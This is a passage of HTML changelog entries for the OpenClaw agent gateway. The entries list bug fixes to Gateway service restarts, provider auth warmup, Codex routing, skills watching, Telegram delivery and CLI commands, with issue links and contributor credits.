<li>Auto-reply/models: keep <code>/models</code> browse replies fast by sharing the bounded read-only catalog path with Gateway model listing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4490684687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84735" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84735/hovercard" href="https://github.com/openclaw/openclaw/pull/84735">#84735</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/safrano9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/safrano9999">@safrano9999</a>.</li>
<li>Browser/Doctor: read macOS Chrome app bundle versions from <code>Info.plist</code> before spawning Chrome and extend the fallback version probe timeout, avoiding false cold-cache warnings from Gatekeeper latency. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503650489" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85418" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85418/hovercard" href="https://github.com/openclaw/openclaw/issues/85418">#85418</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidcittadini/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidcittadini">@davidcittadini</a>.</li>
<li>Codex app-server: disable native Code Mode when the effective exec host is <code>node</code> and keep OpenClaw <code>exec</code>/<code>process</code> available, so <code>/exec host=node</code> routes shell commands through the selected node instead of the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496082157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85012" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85012/hovercard" href="https://github.com/openclaw/openclaw/issues/85012">#85012</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497727664" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85090" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85090/hovercard" href="https://github.com/openclaw/openclaw/pull/85090">#85090</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>Agents: bound embedded auto-compaction session write-lock watchdogs to the compaction timeout instead of the full run timeout, so stuck compaction cannot hold the live session lock for the whole run window. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494569724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84949/hovercard" href="https://github.com/openclaw/openclaw/pull/84949">#84949</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>.</li>
<li>Gateway/agents: return phase-aware <code>agent.wait</code> timeout attribution and only cool auth profiles on provider-started timeouts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249469795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65504" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65504/hovercard" href="https://github.com/openclaw/openclaw/issues/65504">#65504</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Gateway/systemd: launch managed update handoff helpers in a transient user scope so systemd-supervised Update Now flows survive the gateway unit restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476025450" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84068" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84068/hovercard" href="https://github.com/openclaw/openclaw/issues/84068">#84068</a>.</li>
<li>Gateway: defer provider auth-state prewarm until after startup readiness so early gateway tool/session requests are not blocked by provider auth discovery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4500834987" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85272" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85272/hovercard" href="https://github.com/openclaw/openclaw/pull/85272">#85272</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dutifulbob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dutifulbob">@dutifulbob</a>.</li>
<li>Gateway/models: coalesce provider auth-state rewarms after auth-profile failures and log event-loop delay for warm/rewarm work, so provider auth bursts no longer stack full auth sweeps behind channel replies.</li>
<li>Gateway/models: stop cancelled provider auth-state prewarms from continuing full provider sweeps, so reload and auth-failure bursts no longer keep startup busy.</li>
<li>Agents/Codex: show the first plan update as a transient chat status notice without counting it as final assistant content.</li>
<li>CLI/update: walk the macOS process ancestry and honor the inherited Gateway runtime PID before package updates stop the managed Gateway service, so nested in-band updater children can refuse instead of killing the LaunchAgent-supervised Gateway that owns them. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498492729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85120/hovercard" href="https://github.com/openclaw/openclaw/issues/85120">#85120</a>.</li>
<li>Gateway/LaunchAgent: wait for launchd reload bootout to finish and fall back to kickstart when bootstrap races, so reload handoff does not leave the service deregistered. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488288195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84630/hovercard" href="https://github.com/openclaw/openclaw/issues/84630">#84630</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488410216" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84641" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84641/hovercard" href="https://github.com/openclaw/openclaw/pull/84641">#84641</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Gateway/LaunchAgent: treat a concurrent launchd bootstrap as a successful restart when the service is already loaded, avoiding false macOS Gateway restart failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4490404700" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84721" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84721/hovercard" href="https://github.com/openclaw/openclaw/issues/84721">#84721</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4490407392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84722/hovercard" href="https://github.com/openclaw/openclaw/pull/84722">#84722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/googlerest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/googlerest">@googlerest</a>.</li>
<li>Gateway/service: include the active <code>openclaw</code> command bin directory in managed service PATH generation and doctor audit expectations for npm-global macOS installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4478626262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84201/hovercard" href="https://github.com/openclaw/openclaw/issues/84201">#84201</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4483865879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84475" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84475/hovercard" href="https://github.com/openclaw/openclaw/pull/84475">#84475</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jbetala7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jbetala7">@jbetala7</a>.</li>
<li>Control UI/chat: disable the thinking selector for known non-reasoning models instead of showing duplicate Off choices. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476067404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84069/hovercard" href="https://github.com/openclaw/openclaw/issues/84069">#84069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DrippingMellow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DrippingMellow">@DrippingMellow</a>.</li>
<li>Memory: expand <code>~</code> in configured extra memory paths before resolving them, so home-relative folders are not treated as workspace-relative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174961637" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58026" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58026/hovercard" href="https://github.com/openclaw/openclaw/issues/58026">#58026</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stadman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stadman">@stadman</a>.</li>
<li>Skills: treat <code>openclaw.os: macos</code> as Darwin when checking skill requirements, so macOS-only skills no longer report as missing on macOS hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207464550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61338/hovercard" href="https://github.com/openclaw/openclaw/issues/61338">#61338</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jessecq1995/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jessecq1995">@Jessecq1995</a>.</li>
<li>Control UI/logs: strip ANSI escape sequences from displayed Gateway log messages so color codes no longer appear as raw text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240403085" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64399" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64399/hovercard" href="https://github.com/openclaw/openclaw/issues/64399">#64399</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guguangxin-eng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guguangxin-eng">@guguangxin-eng</a>.</li>
<li>Docker: pre-create the workspace and auth-profile config mount points with <code>node</code> ownership so first-run named volumes do not start root-owned. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497404130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85076" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85076/hovercard" href="https://github.com/openclaw/openclaw/issues/85076">#85076</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Noerr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Noerr">@Noerr</a>.</li>
<li>Telegram: pass configured markdown table mode through outbound markdown chunking so chunked sends render tables consistently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497655282" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85085" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85085/hovercard" href="https://github.com/openclaw/openclaw/issues/85085">#85085</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ShuaiHui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ShuaiHui">@ShuaiHui</a>.</li>
<li>Diagnostics/OTel: drop snake_case diagnostic id attributes alongside camelCase ids so exported telemetry cannot leak run, session, message, chat, trace, or tool-call identifiers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333535987" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72645" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72645/hovercard" href="https://github.com/openclaw/openclaw/pull/72645">#72645</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lion0710/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lion0710">@Lion0710</a>.</li>
<li>CLI/update: preserve managed Gateway service environment during package cutovers so macOS LaunchAgent repair/restart reads the pre-update service state instead of caller shell state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463010272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83026" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83026/hovercard" href="https://github.com/openclaw/openclaw/pull/83026">#83026</a>)</li>
<li>Agents/providers: honor per-model <code>api</code> and <code>baseUrl</code> overrides in custom provider auth hooks and transport selection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4417428084" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80487/hovercard" href="https://github.com/openclaw/openclaw/issues/80487">#80487</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4417429259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80488" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80488/hovercard" href="https://github.com/openclaw/openclaw/pull/80488">#80488</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/huveewomg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/huveewomg">@huveewomg</a>.</li>
<li>Gateway/restart: eager-load the lifecycle runtime before in-place upgrade signal handling so package replacement does not deadlock restart imports. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4493066623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84890" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84890/hovercard" href="https://github.com/openclaw/openclaw/pull/84890">#84890</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/myps6415/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/myps6415">@myps6415</a>.</li>
<li>CLI/update: start managed Gateway update handoff helpers from a stable existing directory and tolerate deleted cwd/package roots during macOS LaunchAgent handoff. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4473282252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83808" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83808/hovercard" href="https://github.com/openclaw/openclaw/issues/83808">#83808</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4473943472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83875/hovercard" href="https://github.com/openclaw/openclaw/pull/83875">#83875</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jason-allen-oneal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jason-allen-oneal">@jason-allen-oneal</a>.</li>
<li>Skills: watch each shared skill directory once across agent workspaces instead of once per agent, preventing file-descriptor exhaustion (<code>EMFILE</code>) that disposed bundle-mcp processes and stalled sessions on multi-agent gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495117353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84968/hovercard" href="https://github.com/openclaw/openclaw/issues/84968">#84968</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498689181" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85130" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85130/hovercard" href="https://github.com/openclaw/openclaw/pull/85130">#85130</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Release/security: keep generated npm shrinkwrap package versions inside the pnpm lock graph so published package locks cannot bypass pnpm dependency age and override policy.</li>
<li>Cron: honor <code>cron.retry.retryOn: ["network"]</code> for common network error codes such as <code>EAI_AGAIN</code>, <code>EHOSTUNREACH</code>, and <code>ENETUNREACH</code>.</li>
<li>Gateway chat: broadcast returned agent-run error payloads after an agent starts so ACP/WebChat clients receive terminal idle-timeout errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494484146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84945" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84945/hovercard" href="https://github.com/openclaw/openclaw/issues/84945">#84945</a>.</li>
<li>Gateway chat display: preserve OpenAI-compatible <code>prompt_tokens</code>, <code>completion_tokens</code>, and <code>total_tokens</code> usage fields in sanitized chat history so llama.cpp sessions keep context counts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4386102968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77992" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77992/hovercard" href="https://github.com/openclaw/openclaw/issues/77992">#77992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarTT79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarTT79">@MarTT79</a>.</li>
<li>Dashboard/CLI: allow macOS browser launching through <code>open</code> even when SSH environment variables are present, while preserving Linux SSH no-display protection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4267511627" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67088/hovercard" href="https://github.com/openclaw/openclaw/issues/67088">#67088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/theglove44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/theglove44">@theglove44</a>.</li>
<li>Codex app-server: keep native web search observations out of mirrored chat transcripts while preserving available action query metadata in tool progress telemetry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498152488" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85109" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85109/hovercard" href="https://github.com/openclaw/openclaw/issues/85109">#85109</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ugitmebaby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ugitmebaby">@ugitmebaby</a>.</li>
<li>OpenCode Go: strip unsupported Kimi reasoning replay fields before provider requests so repeated <code>kimi-k2.6</code> turns do not fail schema validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4473302434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83812" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83812/hovercard" href="https://github.com/openclaw/openclaw/issues/83812">#83812</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sleeck/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sleeck">@Sleeck</a>.</li>
<li>Browser/CDP: add a WSL2 portproxy self-loop hint when Chrome DevTools endpoints accept connections but return an empty HTTP reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189130225" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59209" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59209/hovercard" href="https://github.com/openclaw/openclaw/issues/59209">#59209</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Owlock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Owlock">@Owlock</a>.</li>
<li>Agents/tools: add bounded tool-policy audit log entries that identify which allow/deny rule removed tools or blocked a sandboxed tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4152597004" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55801" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55801/hovercard" href="https://github.com/openclaw/openclaw/issues/55801">#55801</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justinjkline/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justinjkline">@justinjkline</a>.</li>
<li>CLI/logs: read implicit local Gateway logs through the passive backend client path so <code>openclaw logs --follow</code> does not register as a paired device, and use the active Linux systemd journal instead of stale configured-file fallbacks when live local RPC is unavailable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470268868" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83656/hovercard" href="https://github.com/openclaw/openclaw/issues/83656">#83656</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265060636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66841" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66841/hovercard" href="https://github.com/openclaw/openclaw/issues/66841">#66841</a>.</li>
<li>Agents/OpenAI: preserve structured provider error code, type, and redacted body metadata on boundary-aware transport failures.</li>
<li>Doctor/Codex: point native Codex asset warnings at the canonical <code>openclaw migrate plan codex</code> preview command. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494538415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84948/hovercard" href="https://github.com/openclaw/openclaw/issues/84948">#84948</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markoa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markoa">@markoa</a>.</li>
<li>CLI/models: make <code>capability model auth logout --agent</code> remove auth profiles from the selected non-default agent store. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497811024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85092/hovercard" href="https://github.com/openclaw/openclaw/issues/85092">#85092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/islandpreneur007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/islandpreneur007">@islandpreneur007</a>.</li>
<li>Gateway/models: reuse prepared provider auth metadata during model-listing auth checks so repeated lookups avoid broad plugin discovery while preserving synthetic local auth.</li>
<li>CLI/status: suppress systemd user-service setup hints when <code>openclaw status --deep</code> can already reach a running Gateway RPC service. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497813806" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85094" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85094/hovercard" href="https://github.com/openclaw/openclaw/issues/85094">#85094</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/islandpreneur007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/islandpreneur007">@islandpreneur007</a>.</li>
<li>CLI/devices: recover local approval when a same-device repair request replaces the request ID being approved.</li>
<li>CLI/agents: retry transient normal-close Gateway handshakes before falling back to embedded <code>openclaw agent</code> execution.</li>
<li>CLI/update: keep managed Gateway service stop/restart status lines out of <code>openclaw update --json</code> stdout so package-update automation can parse the JSON payload.</li>
<li>Plugins: resolve OpenClaw plugin SDK subpaths for native external plugin runtimes without mutating package installs or broadening process-wide module resolution.</li>
<li>Agents/OpenAI: preserve Responses and Chat Completions <code>reasoning_tokens</code> usage metadata without double-counting it in aggregate output tokens. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502043775" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85319" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85319/hovercard" href="https://github.com/openclaw/openclaw/pull/85319">#85319</a>)</li>
<li>Control UI/chat: convert pasted <code>data:image/...;base64,...</code> clipboard text into an image attachment instead of dumping the payload into the composer. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4219271267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62604/hovercard" href="https://github.com/openclaw/openclaw/issues/62604">#62604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cpwilhelmi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cpwilhelmi">@cpwilhelmi</a>.</li>
<li>Providers/Gemini: strip fractional seconds from web-search time range filters so Gemini accepts freshness-bound search requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497228388" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85071" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85071/hovercard" href="https://github.com/openclaw/openclaw/pull/85071">#85071</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Noerr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Noerr">@Noerr</a>.</li>
<li>OpenAI Codex: preserve image input support for sparse <code>openai-codex/gpt-5.5</code> catalog rows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497838305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85095" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85095/hovercard" href="https://github.com/openclaw/openclaw/pull/85095">#85095</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sercada/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sercada">@sercada</a>.</li>
<li>CLI/models: add a piped or pasted API-key path for OpenAI Codex auth and warn when API keys are pasted into token-mode auth. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506010459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85533" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85533/hovercard" href="https://github.com/openclaw/openclaw/pull/85533">#85533</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Telegram: dead-letter missing-harness isolated ingress failures so a poisoned spooled update no longer blocks later same-lane messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504658446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85470" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85470/hovercard" href="https://github.com/openclaw/openclaw/issues/85470">#85470</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506677758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85605" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85605/hovercard" href="https://github.com/openclaw/openclaw/pull/85605">#85605</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Plugins/discovery: strip <code>-plugin</code> package suffixes when deriving plugin id hints so package names line up with manifest ids. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499184691" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85170" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85170/hovercard" href="https://github.com/openclaw/openclaw/pull/85170">#85170</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JulyanXu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JulyanXu">@JulyanXu</a>.</li>
<li>Tlon: stop advertising a non-existent agent tool contract in the plugin manifest.</li>
